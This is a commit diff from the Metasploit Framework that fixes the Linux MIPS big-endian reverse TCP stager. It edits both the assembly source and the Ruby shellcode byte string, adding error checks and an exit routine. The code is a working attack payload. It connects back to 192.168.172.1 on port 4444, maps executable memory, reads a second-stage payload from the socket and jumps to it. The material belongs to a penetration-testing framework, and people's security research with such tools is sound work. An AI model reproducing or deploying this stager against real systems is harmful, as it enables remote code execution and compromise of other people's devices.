fix reverse tcp stager src
tkmru
parent
d1f08a80bd
commit
d02d6826a9
|
|
@ -4,7 +4,7 @@
|
||||||
# Type: Stager
|
# Type: Stager
|
||||||
# Qualities: No Nulls out of the IP / Port data
|
# Qualities: No Nulls out of the IP / Port data
|
||||||
# Platforms: Linux MIPS Big Endian
|
# Platforms: Linux MIPS Big Endian
|
||||||
# Authors: juan vazquez <juan.vazquez [at] metasploit.com>
|
# Authors: juan vazquez <juan.vazquez [at] metasploit.com>, tkmru
|
||||||
# License:
|
# License:
|
||||||
#
|
#
|
||||||
# This file is part of the Metasploit Exploit Framework
|
# This file is part of the Metasploit Exploit Framework
|
||||||
|
|
@ -29,12 +29,11 @@
|
||||||
##
|
##
|
||||||
.text
|
.text
|
||||||
.align 2
|
.align 2
|
||||||
.globl main
|
.globl main
|
||||||
.set nomips16
|
.set nomips16
|
||||||
main:
|
main:
|
||||||
.set noreorder
|
.set noreorder
|
||||||
.set nomacro
|
.set nomacro
|
||||||
|
|
||||||
# socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
|
# socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
|
||||||
# a0: domain = PF_INET (2)
|
# a0: domain = PF_INET (2)
|
||||||
# a1: type = SOCK_STREAM (2)
|
# a1: type = SOCK_STREAM (2)
|
||||||
|
|
@ -47,8 +46,9 @@ main:
|
||||||
slti $a2, $zero, -1
|
slti $a2, $zero, -1
|
||||||
li $v0, 4183
|
li $v0, 4183
|
||||||
syscall 0x40404
|
syscall 0x40404
|
||||||
|
slt $s0, $zero, $a3
|
||||||
sw $v0, -4($sp) # store the file descriptor for the socket on the stack
|
bne $s0, $zero, failed
|
||||||
|
sw $v0, -4($sp) # store the file descriptor for the socket on the stack
|
||||||
|
|
||||||
# connect(sockfd, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("192.168.172.1")}, 16)
|
# connect(sockfd, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("192.168.172.1")}, 16)
|
||||||
# a0: sockfd
|
# a0: sockfd
|
||||||
|
|
@ -69,6 +69,8 @@ main:
|
||||||
nor $a2, $t4, $zero
|
nor $a2, $t4, $zero
|
||||||
li $v0, 4170
|
li $v0, 4170
|
||||||
syscall 0x40404
|
syscall 0x40404
|
||||||
|
slt $s0, $zero, $a3
|
||||||
|
bne $s0, $zero, failed
|
||||||
|
|
||||||
# mmap(0xffffffff, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0)
|
# mmap(0xffffffff, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0)
|
||||||
# a0: addr = -1
|
# a0: addr = -1
|
||||||
|
|
@ -92,7 +94,8 @@ main:
|
||||||
sw $2, -5($t3) # Doesn't use $sp directly to avoid nulls
|
sw $2, -5($t3) # Doesn't use $sp directly to avoid nulls
|
||||||
li $v0, 4090
|
li $v0, 4090
|
||||||
syscall 0x40404
|
syscall 0x40404
|
||||||
|
slt $s0, $zero, $a3
|
||||||
|
bne $s0, $zero, failed
|
||||||
sw $v0, -8($sp) # Stores the mmap'ed address on the stack
|
sw $v0, -8($sp) # Stores the mmap'ed address on the stack
|
||||||
|
|
||||||
# read(sockfd, addr, 4096)
|
# read(sockfd, addr, 4096)
|
||||||
|
|
@ -106,6 +109,8 @@ main:
|
||||||
addi $a2, $a2, -1
|
addi $a2, $a2, -1
|
||||||
li $v0, 4003
|
li $v0, 4003
|
||||||
syscall 0x40404
|
syscall 0x40404
|
||||||
|
slt $s0, $zero, $a3
|
||||||
|
bne $s0, $zero, failed
|
||||||
|
|
||||||
# cacheflush(addr, nbytes, DCACHE)
|
# cacheflush(addr, nbytes, DCACHE)
|
||||||
# a0: addr
|
# a0: addr
|
||||||
|
|
@ -119,11 +124,20 @@ main:
|
||||||
add $a2, $t1, $0
|
add $a2, $t1, $0
|
||||||
li $v0, 4147
|
li $v0, 4147
|
||||||
syscall 0x40404
|
syscall 0x40404
|
||||||
|
slt $s0, $zero, $a3
|
||||||
|
bne $s0, $zero, failed
|
||||||
# jmp to the stage
|
# jmp to the stage
|
||||||
lw $s1, -8($sp)
|
lw $s1, -8($sp)
|
||||||
lw $s2, -4($sp)
|
lw $s2, -4($sp)
|
||||||
jalr $s1
|
jalr $s1
|
||||||
|
|
||||||
|
failed:
|
||||||
|
# exit(status)
|
||||||
|
# a0: status
|
||||||
|
# v0: syscall = __NR_exit (4001)
|
||||||
|
li $a0, 1
|
||||||
|
li $v0, 4001
|
||||||
|
syscall 0x40404
|
||||||
|
|
||||||
.set macro
|
.set macro
|
||||||
.set reorder
|
.set reorder
|
||||||
|
|
|
||||||
|
|
@ -41,6 +41,7 @@ module MetasploitModule
|
||||||
"\x21\xe5\xff\xfd" + # addi a1,t7,-3
|
"\x21\xe5\xff\xfd" + # addi a1,t7,-3
|
||||||
"\x28\x06\xff\xff" + # slti a2,zero,-1
|
"\x28\x06\xff\xff" + # slti a2,zero,-1
|
||||||
"\x24\x02\x10\x57" + # li v0,4183
|
"\x24\x02\x10\x57" + # li v0,4183
|
||||||
|
# socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
|
||||||
"\x01\x01\x01\x0c" + # syscall 0x40404
|
"\x01\x01\x01\x0c" + # syscall 0x40404
|
||||||
"\x00\x07\x80\x2a" + # slt s0,zero,a3
|
"\x00\x07\x80\x2a" + # slt s0,zero,a3
|
||||||
"\x16\x00\x00\x36" + # bnez s0,0x4006bc <failed>
|
"\x16\x00\x00\x36" + # bnez s0,0x4006bc <failed>
|
||||||
|
|
@ -58,6 +59,7 @@ module MetasploitModule
|
||||||
"\x24\x0c\xff\xef" + # li t4,-17
|
"\x24\x0c\xff\xef" + # li t4,-17
|
||||||
"\x01\x80\x30\x27" + # nor a2,t4,zero
|
"\x01\x80\x30\x27" + # nor a2,t4,zero
|
||||||
"\x24\x02\x10\x4a" + # li v0,4170
|
"\x24\x02\x10\x4a" + # li v0,4170
|
||||||
|
# connect(sockfd, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("192.168.172.1")}, 16)
|
||||||
"\x01\x01\x01\x0c" + # syscall 0x40404
|
"\x01\x01\x01\x0c" + # syscall 0x40404
|
||||||
"\x00\x07\x80\x2a" + # slt s0,zero,a3
|
"\x00\x07\x80\x2a" + # slt s0,zero,a3
|
||||||
"\x16\x00\x00\x25" + # bnez s0,0x4006bc <failed>
|
"\x16\x00\x00\x25" + # bnez s0,0x4006bc <failed>
|
||||||
|
|
@ -74,6 +76,7 @@ module MetasploitModule
|
||||||
"\xad\x60\xff\xff" + # sw zero,-1(t3)
|
"\xad\x60\xff\xff" + # sw zero,-1(t3)
|
||||||
"\xad\x62\xff\xfb" + # sw v0,-5(t3)
|
"\xad\x62\xff\xfb" + # sw v0,-5(t3)
|
||||||
"\x24\x02\x0f\xfa" + # li v0,4090
|
"\x24\x02\x0f\xfa" + # li v0,4090
|
||||||
|
# mmap(0xffffffff, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0)
|
||||||
"\x01\x01\x01\x0c" + # syscall 0x40404
|
"\x01\x01\x01\x0c" + # syscall 0x40404
|
||||||
"\x00\x07\x80\x2a" + # slt s0,zero,a3
|
"\x00\x07\x80\x2a" + # slt s0,zero,a3
|
||||||
"\x16\x00\x00\x15" + # bnez s0,0x4006bc <failed>
|
"\x16\x00\x00\x15" + # bnez s0,0x4006bc <failed>
|
||||||
|
|
@ -83,6 +86,7 @@ module MetasploitModule
|
||||||
"\x24\x06\x10\x01" + # li a2,4097
|
"\x24\x06\x10\x01" + # li a2,4097
|
||||||
"\x20\xc6\xff\xff" + # addi a2,a2,-1
|
"\x20\xc6\xff\xff" + # addi a2,a2,-1
|
||||||
"\x24\x02\x0f\xa3" + # li v0,4003
|
"\x24\x02\x0f\xa3" + # li v0,4003
|
||||||
|
# read(sockfd, addr, 4096)
|
||||||
"\x01\x01\x01\x0c" + # syscall 0x40404
|
"\x01\x01\x01\x0c" + # syscall 0x40404
|
||||||
"\x00\x07\x80\x2a" + # slt s0,zero,a3
|
"\x00\x07\x80\x2a" + # slt s0,zero,a3
|
||||||
"\x16\x00\x00\x0c" + # bnez s0,0x4006bc <failed>
|
"\x16\x00\x00\x0c" + # bnez s0,0x4006bc <failed>
|
||||||
|
|
@ -92,6 +96,7 @@ module MetasploitModule
|
||||||
"\x01\x20\x48\x27" + # nor t1,t1,zero
|
"\x01\x20\x48\x27" + # nor t1,t1,zero
|
||||||
"\x01\x20\x30\x20" + # add a2,t1,zero
|
"\x01\x20\x30\x20" + # add a2,t1,zero
|
||||||
"\x24\x02\x10\x33" + # li v0,4147
|
"\x24\x02\x10\x33" + # li v0,4147
|
||||||
|
# cacheflush(addr, nbytes, DCACHE)
|
||||||
"\x01\x01\x01\x0c" + # syscall 0x40404
|
"\x01\x01\x01\x0c" + # syscall 0x40404
|
||||||
"\x00\x07\x80\x2a" + # slt s0,zero,a3
|
"\x00\x07\x80\x2a" + # slt s0,zero,a3
|
||||||
"\x16\x00\x00\x03" + # bnez s0,0x4006bc <failed>
|
"\x16\x00\x00\x03" + # bnez s0,0x4006bc <failed>
|
||||||
|
|
@ -101,6 +106,7 @@ module MetasploitModule
|
||||||
# 4006bc <failed>:
|
# 4006bc <failed>:
|
||||||
"\x24\x04\x00\x01" + # li a0,1
|
"\x24\x04\x00\x01" + # li a0,1
|
||||||
"\x24\x02\x0f\xa1" + # li v0,4001
|
"\x24\x02\x0f\xa1" + # li v0,4001
|
||||||
|
# exit(status)
|
||||||
"\x01\x01\x01\x0c" + # syscall 0x40404
|
"\x01\x01\x01\x0c" + # syscall 0x40404
|
||||||
"\x00\x20\x08\x25" + # move at,at
|
"\x00\x20\x08\x25" + # move at,at
|
||||||
"\x00\x20\x08\x25" # move at,at
|
"\x00\x20\x08\x25" # move at,at
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue